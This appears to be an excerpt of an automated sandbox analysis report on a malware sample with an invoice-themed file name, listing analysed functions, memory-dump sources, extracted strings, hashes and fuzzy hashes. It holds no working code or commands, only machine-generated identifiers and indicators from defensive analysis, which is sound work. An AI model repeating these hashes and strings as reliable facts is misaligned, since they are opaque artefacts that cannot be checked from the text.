Instruction Fuzzy Hash: 29C08033150644AFC711EF95CD01F0177A9F798B40F000421F30447570C631FC10D644

Function 01750310 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
Instruction ID: 3503616d8dd4f5168892c0b07d6c4a8d3b4533cc1b886396258214cf7fd5c5b9
Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
Instruction Fuzzy Hash: 91D0123610024CEFCB01DF41C890D9AB72AFBD8710F148019FD19076118A71ED62DA50

Function 01730750 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
Instruction ID: 339144d1e80c19ab8bfd9a7e587b31f9f52084aed25446689298c66b8b8865fa
Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
Instruction Fuzzy Hash: 94C04879B41A428FCF16EB2AD298F49B7E4FB44740F150890E849CBB22EB24E841CA10

Function 01772890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0177293C
___swprintf_l.LIBCMT ref: 0177295E
___swprintf_l.LIBCMT ref: 017729A3
___swprintf_l.LIBCMT ref: 017AA52E

Strings

::ffff:0:%u.%u.%u.%u, xrefs: 017AA54E
::%hs%u.%u.%u.%u, xrefs: 017AA527
:%u.%u.%u.%u, xrefs: 017AA5B8
ffff:, xrefs: 017AA504

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 08171dfc47b51d683078dff7b81dc4da9a8ca70ed3c47d555aed9f505293885e
Instruction ID: c36ed54a1c50f272d8ce9102c9b1608a40863b64ae524cfb324e400637d69a8b
Opcode Fuzzy Hash: 08171dfc47b51d683078dff7b81dc4da9a8ca70ed3c47d555aed9f505293885e
Instruction Fuzzy Hash: 2651E8B5A00116BFDF11DB9C889097EFBB8BB48240B548269F5A5E7646D334DE40CBA0

Function 017E2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 017E24A6
___swprintf_l.LIBCMT ref: 017E24E2
___swprintf_l.LIBCMT ref: 017E257D
___swprintf_l.LIBCMT ref: 017E25A3
___swprintf_l.LIBCMT ref: 017E25C8
___swprintf_l.LIBCMT ref: 017E2608

Strings

::%hs%u.%u.%u.%u, xrefs: 017E249E
:%u.%u.%u.%u, xrefs: 017E25FF
ffff:, xrefs: 017E247D, 017E249D
::ffff:0:%u.%u.%u.%u, xrefs: 017E24DA

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 6417eeacf562209f587dd9ddc14b3a15afb0892d6f045cade1444b59b1f994bf
Instruction ID: 5698160bf4b54df8080d47a94eb3d93264229ccc79995da84207c64c8e45ff63
Opcode Fuzzy Hash: 6417eeacf562209f587dd9ddc14b3a15afb0892d6f045cade1444b59b1f994bf
Instruction Fuzzy Hash: F451F7B1A00645AECB30DF5CC99497FFBFCEB4C200B1484A9E596D7643EAB4EE408760

Function 01767630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 017A4655
Execute=1, xrefs: 017A4713
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 017A46FC
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 017A4742
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 017A4725
CLIENT(ntdll): Processing section info %ws..., xrefs: 017A4787
ExecuteOptions, xrefs: 017A46A0

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: e831eea7a8ab1139ec9a7772bad6206688b8add1e1833c4b1e4306371dc765c6
Instruction ID: e0e2a32de2b374f20e02bd3302117b326bee40e747b4f1d5f6bc2b85d6eca8f6
Opcode Fuzzy Hash: e831eea7a8ab1139ec9a7772bad6206688b8add1e1833c4b1e4306371dc765c6
Instruction Fuzzy Hash: B3513B71600219BAEF25AAA8DC99FEDF7BCEF14348F4401E9DA05AB181E7719E418F50

Function 01806940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
Instruction ID: 3bee79b3e0be4b0c9febe298baf1d389d433fd6b5b65437f558d2b6b3acc53b0
Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
Instruction Fuzzy Hash: 420249705083469FD756CF18C894A6BBBE5FFC8704F10892DF9858B2A4E731EA45CB42

Function 0177B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 0177B6BF

Strings

0, xrefs: 0177B695
-, xrefs: 0177B650
+, xrefs: 0177B65A
0, xrefs: 0177B66F

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction ID: 1bb7149d1a0cb93d38ecdca879809e52650bba104c9df50c27eafb636c1206a1
Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction Fuzzy Hash: 6A81F370E452498EEF25CF6CC8907FEFBB1AF85320F18465AE961E7295C7309840CB91

Function 017E20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 017E214F
___swprintf_l.LIBCMT ref: 017E2172

Strings

[, xrefs: 017E212B
%%%u, xrefs: 017E2146
]:%u, xrefs: 017E2169

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: 8ed0f896f47c188ab900f7f3fb57742a0f9d3d842f4b2555b9fbe6a9e3ba2be5
Instruction ID: 20254af916543ff511e6208330d0042110bf8f94ebc7ab42019548e7358be7f2
Opcode Fuzzy Hash: 8ed0f896f47c188ab900f7f3fb57742a0f9d3d842f4b2555b9fbe6a9e3ba2be5
Instruction Fuzzy Hash: 8421517AA00119ABDB11DE7DC848AAEFBEDEF58644F140126E915E3205E730DA058BA1

Function 0175F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 017A031E
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 017A02BD
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 017A02E7

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: fec9b82cc3d4fc2513bde08f40f5d940dbcc1d987bf0f1ecc6a4625e52c9ca00
Instruction ID: d41e43376ba3f03d8b9d101faf7e22051bc0e2757e27c2e4c0f805d852c8fb15
Opcode Fuzzy Hash: fec9b82cc3d4fc2513bde08f40f5d940dbcc1d987bf0f1ecc6a4625e52c9ca00
Instruction Fuzzy Hash: 99E1BC306087419FD765CF28C884B6AFBE0FB88314F540A6DF9A58B2E1D7B4E944CB52

Function 0176BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 017A7B7F
RTL: Re-Waiting, xrefs: 017A7BAC
RTL: Resource at %p, xrefs: 017A7B8E

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: d7119c8843c1ef91a6153afd254a6557f6c8dd6d85eb3c101c23dd010dcead80
Instruction ID: 57f9efc374f229f1e96087e10a56573ce7fcd30ea34db358e54a8b17c989daed
Opcode Fuzzy Hash: d7119c8843c1ef91a6153afd254a6557f6c8dd6d85eb3c101c23dd010dcead80
Instruction Fuzzy Hash: 8341E3713047029FD725DE29CC40BAAF7E9EF99710F100A2DF956DB690DB32E9058B91

Function 0176B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017A728C

Strings

RTL: Re-Waiting, xrefs: 017A72C1
RTL: Resource at %p, xrefs: 017A72A3
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 017A7294

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: ef2f728a0a4362ff74ab582ef9694eaabde55c8eff55e2bea6e44ae2f753ff3c
Instruction ID: e5c7221d74435754e70b1f76a828d022c359c70bfa21036d32797fb35a05964b
Opcode Fuzzy Hash: ef2f728a0a4362ff74ab582ef9694eaabde55c8eff55e2bea6e44ae2f753ff3c
Instruction Fuzzy Hash: 4F41F031704202ABD725DE29CC41BAAFBB9FB95710F100629FD55EB280DB21F84287D1

Function 017E2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 017E238D
___swprintf_l.LIBCMT ref: 017E23B3

Strings

%%%u, xrefs: 017E2384
]:%u, xrefs: 017E23AA

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: ec1ca3065fcf90f0731e8a5b66a270b9cd65154204261415d05b3786a76bfc84
Instruction ID: 60fd25e2c63f144399f9c4e662fcd30ee5bd82674714fdd0ac39bacda7b49c3e
Opcode Fuzzy Hash: ec1ca3065fcf90f0731e8a5b66a270b9cd65154204261415d05b3786a76bfc84
Instruction Fuzzy Hash: 22315472A00219AFDB20DE2DCC44BEEF7FCEB58610F54455AE949E3245EB309A458FA0

Function 01777D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 01777E8B

Strings

-, xrefs: 01777DDD
+, xrefs: 01777DE8

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction ID: 50e45cf47cb30262fda08364a591631b75d38129fd0e80e2deaa660339a2b138
Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction Fuzzy Hash: 8491E371E002069BEF28CF6DC989ABEFBA5EF44320F54491AE955E72C4E7708981C751

Function 01739126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

@, xrefs: 01739175
$, xrefs: 01739191

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: cb921bfcf9f4a4b910f4d57c310d82fcf5bd072fce7b9dbcd7d21da6f356f830
Instruction ID: bd230fedec3294854c65c95dbba2adf87ef4f038640cb517fe25e002e0fe0675
Opcode Fuzzy Hash: cb921bfcf9f4a4b910f4d57c310d82fcf5bd072fce7b9dbcd7d21da6f356f830
Instruction Fuzzy Hash: 22811B72D002699BDB31DF54CC45BEEB7B4AB48714F1041DAEA19B7681E7709E84CFA0

Function 017BCEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON

Download Yara Rule

APIs

@_EH4_CallFilterFunc@8.LIBCMT ref: 017BCFBD

Strings

@, xrefs: 017BCF0A
@4Cw@4Cw, xrefs: 017BCFD5, 017BCFDA, 017BCFF1

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID: CallFilterFunc@8
String ID: @$@4Cw@4Cw
API String ID: 4062629308-3101775584
Opcode ID: fa29a2504c2030e17a14009c9ff48fca776333ef4fe0f393fd9c15be2d016526
Instruction ID: a73438d799a6a6f38e4de533d7fa01d359e0956f42c025574647c7f3f57b4cad
Opcode Fuzzy Hash: fa29a2504c2030e17a14009c9ff48fca776333ef4fe0f393fd9c15be2d016526
Instruction Fuzzy Hash: 0441D071A00225DFCB329FA9C884AADFBB8FF59704F10416AEA14DB258D734D941CB61

Analysis Process: fXZvHKoWCzop.exePID: 5948, Parent PID: 3384COMMON

Executed Functions

Function 037E47F0 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_fXZvHKoWCzop.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30397d5770ca81035d337727d1edf40a40642d1b39511347320727faef653b37
Instruction ID: 6ce43365d7d891a739282713c61a7d12c098884abe6ace8c2506fe8cc34fa33a
Opcode Fuzzy Hash: 30397d5770ca81035d337727d1edf40a40642d1b39511347320727faef653b37
Instruction Fuzzy Hash: 653185116593F14DD30E836D08BD575AFD28E5B20174EC2EEDADA6F2F3C4888419D3A5

Function 037E3EF0 Relevance: 41.6, Strings: 33, Instructions: 397COMMON

Download Yara Rule

Strings

r#, xrefs: 037E3F85
", xrefs: 037E42FE
N`, xrefs: 037E40C9
Pl, xrefs: 037E3F42
F2, xrefs: 037E3FA3
6, xrefs: 037E40EE
<B, xrefs: 037E404B
9, xrefs: 037E4212
>, xrefs: 037E42A0
f, xrefs: 037E423A
5, xrefs: 037E4226
, xrefs: 037E40AB
B!, xrefs: 037E3FAD
:, xrefs: 037E428C
., xrefs: 037E4083
l<, xrefs: 037E3FC5
<, xrefs: 037E40DA
G, xrefs: 037E42EA
<d, xrefs: 037E417B
w, xrefs: 037E42D6
I, xrefs: 037E41B1
*, xrefs: 037E41C5
y, xrefs: 037E402B
N, xrefs: 037E41E3
<, xrefs: 037E425A
h, xrefs: 037E41D9
Py, xrefs: 037E3F99
~, xrefs: 037E4355
H, xrefs: 037E4648
+, xrefs: 037E406F
yQ, xrefs: 037E3FCC
q, xrefs: 037E3F26
t, xrefs: 037E4003

Memory Dump Source

Source File: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_fXZvHKoWCzop.jbxd

Yara matches

Similarity

API ID:
String ID: $"$*$+$.$5$6$9$:$<$<$<B$<d$>$B!$F2$G$H$I$N$N`$Pl$Py$f$h$l<$q$r#$t$w$y$yQ$~
API String ID: 0-2925556566
Opcode ID: 40379265bb7df085e40e3cabaa4eb20da14e33847cb568ee75067ff2bd9af979
Instruction ID: ce60e4966a336606fa2969f64b767e335065c0c72dab2d6c000ea13dd9e0ab5f
Opcode Fuzzy Hash: 40379265bb7df085e40e3cabaa4eb20da14e33847cb568ee75067ff2bd9af979
Instruction Fuzzy Hash: EB327AB0D05269CBEB24CF46CD98BDDBBB1BB49308F1082D9C54D6B280C7B95A89DF54

Function 037F1A30 Relevance: 6.4, Strings: 5, Instructions: 153COMMON

Download Yara Rule

Strings

\, xrefs: 037F1ACC
O, xrefs: 037F1ABE
S, xrefs: 037F1AB0
s, xrefs: 037F1AB7
6, xrefs: 037F1AC5

Memory Dump Source

Source File: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_fXZvHKoWCzop.jbxd

Yara matches

Similarity

API ID:
String ID: 6$O$S$\$s
API String ID: 0-3854637164
Opcode ID: 7f4a07c6b05097826eac9dbe7d0fd848dc1fa499c80b28f45cee318099b43179
Instruction ID: 36e4bcebf1d45b99207735e3d2e1acec5fde6fd6dd76cc211839e5187e77ba05
Opcode Fuzzy Hash: 7f4a07c6b05097826eac9dbe7d0fd848dc1fa499c80b28f45cee318099b43179
Instruction Fuzzy Hash: 315171B6900218EFDB50EFD5EC88AEFB378EF44314F444699EA089B240E7755A44CBA1

Function 037FF1F0 Relevance: 1.3, Strings: 1, Instructions: 65COMMON

Download Yara Rule

Strings

<, xrefs: 037FF249

Memory Dump Source

Source File: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_fXZvHKoWCzop.jbxd

Yara matches

Similarity

API ID:
String ID: <
API String ID: 0-1285232573
Opcode ID: 024575c62923436ffd5481da9b0bb52d9932d19dac76625c79e3621ca40d62bf
Instruction ID: b8064f05d62ac88972b081ce2f11e318a2f0a3431990bfa3269e0c7c421ae4ac
Opcode Fuzzy Hash: 024575c62923436ffd5481da9b0bb52d9932d19dac76625c79e3621ca40d62bf
Instruction Fuzzy Hash: AE21EDB6D11218AF8B40DFA9D9419EFB7F9EB88210F14465AE919E7200E7705A14CBE1

Function 037DD760 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_fXZvHKoWCzop.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b876e1c996c710e415833859f3166c3de523746ac34df5dfb29ae8b2f03162f1
Instruction ID: 89bc6c8ee3a2190a8ece3e80510f89df44b5b8e28d15006823e17f2ad1f4b146
Opcode Fuzzy Hash: b876e1c996c710e415833859f3166c3de523746ac34df5dfb29ae8b2f03162f1
Instruction Fuzzy Hash: B6412CB5D11218AFDB14CF99DC85AEEBBBCEF48710F10455AFA18E6241E7B19640CBE0

Function 038028E0 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_fXZvHKoWCzop.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78fafe7ad30a57a35ea9c3768bfd1248b3dcef5adee807cf2153c4e1bece9cf8
Instruction ID: 187f5c6aa0f5067292ceadf36c5a4afb8fc56a3929f16a5e1f391d5854cc62e8
Opcode Fuzzy Hash: 78fafe7ad30a57a35ea9c3768bfd1248b3dcef5adee807cf2153c4e1bece9cf8
Instruction Fuzzy Hash: 0D31C5B5A00248AFDB54DF98D841EEFB7B9FF88310F108509F919A7340D770A951CBA5

Function 03802A50 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_fXZvHKoWCzop.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7c20ea87544de9578d242d9f3433e45f2f51641e715e27a03722d46be6ff526
Instruction ID: 2c1e0e78421901d12bedfa72113c07b48fbd913b9bea15523c093353efeffc52
Opcode Fuzzy Hash: e7c20ea87544de9578d242d9f3433e45f2f51641e715e27a03722d46be6ff526
Instruction Fuzzy Hash: F731C875A00258ABDB14DF98DC41EDFB7B9EF88310F104649F919AB240D770A951CBA1

Function 03802310 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_fXZvHKoWCzop.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33f35f222e79267cda61771ad491b163518a9eb4a0f895ff21eb3da1855138c6
Instruction ID: c4d98a7b58d38b6bdf4fb6dbfe781db70abc6192da1c41cb637c8dd5359a770b
Opcode Fuzzy Hash: 33f35f222e79267cda61771ad491b163518a9eb4a0f895ff21eb3da1855138c6
Instruction Fuzzy Hash: 6031FB75A00348ABDB14DF99DC41FDFB7B9EF89300F108559F909AB280D770A951CBA1

Function 03802C80 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_fXZvHKoWCzop.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f22362b4133216e11ebc80e1989a3fa8abc5511cd86426a82bc20c4a7ac32fc
Instruction ID: 2d3deb7c4b0a9a7ba8465f6ed50bfa37b4c240ba65c0c8203b918505218f2cd3
Opcode Fuzzy Hash: 4f22362b4133216e11ebc80e1989a3fa8abc5511cd86426a82bc20c4a7ac32fc
Instruction Fuzzy Hash: 412119B5A00349ABDB14DF98DC41FAFB7B9EF89310F004549FD19AB280D770A911CBA2

Function 037F1870 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_fXZvHKoWCzop.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7243db35e49e6d558d81a3b265ac229326f5dc83466a154b912875a9712f41b
Instruction ID: eed2bc551783f075cf1e5756282c8ce52644085e6d6e3dc508c77c86e39a3dc6
Opcode Fuzzy Hash: e7243db35e49e6d558d81a3b265ac229326f5dc83466a154b912875a9712f41b
Instruction Fuzzy Hash: 5E1191763803057AF720DA5A9C42FAB735CDB84B14F244054FF04AE2C2D6B5B91146B5

Function 03802120 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_fXZvHKoWCzop.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6de4e8e794abbbb5e266705734340a44581ee0754b36884a0cac81d72458fcd
Instruction ID: 911e0bbc3dc854b309e4bb8e2ea02ceba79c95bbc8e8f44554909df082e82457
Opcode Fuzzy Hash: f6de4e8e794abbbb5e266705734340a44581ee0754b36884a0cac81d72458fcd
Instruction Fuzzy Hash: 781163756003546BDB10EF98DC45FEF77BCEB85710F004549F909AB280D7B06951CBA2

Function 03801FA0 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_fXZvHKoWCzop.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7eba9eba8edc6bf6bfaef6dfb6ff68aab255dc4b3ad7617538abe7428e261911
Instruction ID: f31d86872cca6ddc07918f16936f09938cf60e12fec50b88198bef6f3b5ab17a
Opcode Fuzzy Hash: 7eba9eba8edc6bf6bfaef6dfb6ff68aab255dc4b3ad7617538abe7428e261911
Instruction Fuzzy Hash: E9113075640718ABDB10EF98DC45FAF77BCEF85710F004549F919AB280D7706911CBA2

Function 037FED00 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_fXZvHKoWCzop.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3df533c076701eddffe626723c735e4ced10eaf620b665c3399e3ff58cd4585a
Instruction ID: cbf019cd728a2bb5807dfe45286fb672995ce6250a0d74e108087387232168ad
Opcode Fuzzy Hash: 3df533c076701eddffe626723c735e4ced10eaf620b665c3399e3ff58cd4585a
Instruction Fuzzy Hash: 9611FEB6D0121CAF8B00DFA9D9419EFBBF9FF88210F14416AE915E7200E7745A048BE1

Function 03800040 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_fXZvHKoWCzop.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d39e4e5c5fe3078fa588d5823e175152e60adf4166d1dbe10866e8505dd36bc
Instruction ID: a6b7e3968aab02af604318eb99c8f8beea72c6a0798f181c2fd3f4c0b5a2825d
